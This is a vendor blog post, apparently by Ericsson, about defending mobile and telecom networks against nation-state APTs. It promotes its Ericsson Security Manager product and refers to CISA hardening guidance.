Telecom networks are vital to national security and there is significant risk when they are experiencing a sophisticated cyberattack. To address these concerns and enhance network protection, the US Department of Homeland Security's (DHS) Cybersecurity and Infrastructure Security Agency (CISA) has offered valuable guidance to the telecom industry that stresses best practices described in previously published frameworks by the US National Institute of Standards and Technology (NIST).
In 2024, networks faced substantial challenges due to Advanced Persistent Threats (APTs) that specifically targeted telecom networks. Looking ahead, 2025 presents renewed risks as global crises could trigger new cyberattacks on critical infrastructure. Malicious cyber activity is a real and menacing threat. Nation states sponsor APTs to develop and deploy sophisticated attack chains to reach their goals of reconnaissance, espionage, data exfiltration, unauthorized control, and/or disruption. Details of the attack can change as the adversary moves laterally with changing attack methods on changing targets in the network. APTs are discussed in depth in Ericsson’s recent blog Evolving the security posture of 5G networks
Ericsson Security Solutions team focuses on the adversary’s tactics, which are tactical goals in the cyber kill chain of the threat actors to reach their objectives. These tactics grow more complex as threats continuously evolve. IT cybersecurity tools have capabilities to detect malware based on signature and behavioral similarities to other attacks in IT systems, but evolving APTs have moved beyond those approaches. For some time, attackers have moved to using system binaries, so called living-off-the-land strategies. Now the attacks are increasingly using a combination of unpatched vulnerabilities, valid credentials, identities and system APIs. To defend against these threats in mobile networks, one needs in-depth understanding of the target mobile assets.
Two key approaches for defending against APTs are to implement industry best practices for hardening and continuous monitoring for visibility. These are accomplished in the Operations phase with an Ericsson cyber defense platform – the Ericsson Security Manager (ESM). ESM is a powerful tool to help mobile service providers operationalize security management as well as implement CISA guidance for hardening and securing against APTs [1].
ESM combines multiple data sources for visibility that enables an actionable identify-protect-detect-response cyber defense solution.
- telecom threat intelligence
- insights of adversary objectives and tactics
- analysis of known and possible attack paths (tactics, techniques, and procedures) to reach the objectives
- in-depth know-how of mobile network solutions and especially the key data that interests the threat actors
Typically, APTs have attacked telecom systems that contain or have access to subscriber data such as call data records, IMSIs, and authentication vectors. ESM has a range of capabilities to protect and secure this data. These protective capabilities can mitigate risk of exploits by APTs:
- provide holistic defense against attacks on mobile network operators, based on telecom threat intelligence and focused on defending against the specific objectives the threat actors such as espionage.
- maintain a security-focused asset inventory that knows all the systems in the mobile network, including the special interfaces and log sources.
- protect interfaces by incorporating know-how of what secure configurations are needed to prevent or mitigate attacker success in compromising the system through the interfaces.
- protect traffic encryption by managing relevant related configurations and by providing automation of certificate management.
- collect all relevant security and audit trail logs from the systems and provide insights through automated threat detection methods and correlation capabilities specific to the system and the specific adversary objectives.
- provide sensor-based threat detection capabilities in a defense-in-depth manner.
- detect the special tactics, techniques and procedures that would be used by attackers to gain access to the specific system and data they are after. This includes, for example, bpfdoor malware or specific living-off-the-land mechanisms.
Mobile service providers, utilities and other critical infrastructure operators face increasing threats from sophisticated threat actors aiming to disrupt critical services and steal private data. Threat actors from cyber criminals to nation-state sponsored APTs are targeting mobile networks worldwide. With ESM, Ericsson offers the critical capabilities required to defend against these threat actors. Ericsson cyber defense solutions offer tools to operationalize security management in order to effectively mitigate APTs in mobile networks. Managing security configurations together with early detection of APTs prevents tactics such as initial access and lateral movement and gives the security team time to respond before data can be exfiltrated to attacker-controlled infrastructure. With secure product and cyber defense solutions, Ericsson enables secure and resilient mobile networks based on the defendable architectures concept with security built in.
More details about ESM can be found at Security Manager - Ericsson and ZTA (Zero Trust Architecture) for advancing mobile network security operations
- Enhanced Visibility and Hardening Guidance for Communications Infrastructure | CISA
Read more:
Ensuring secure networks
Evolving the security posture of 5G
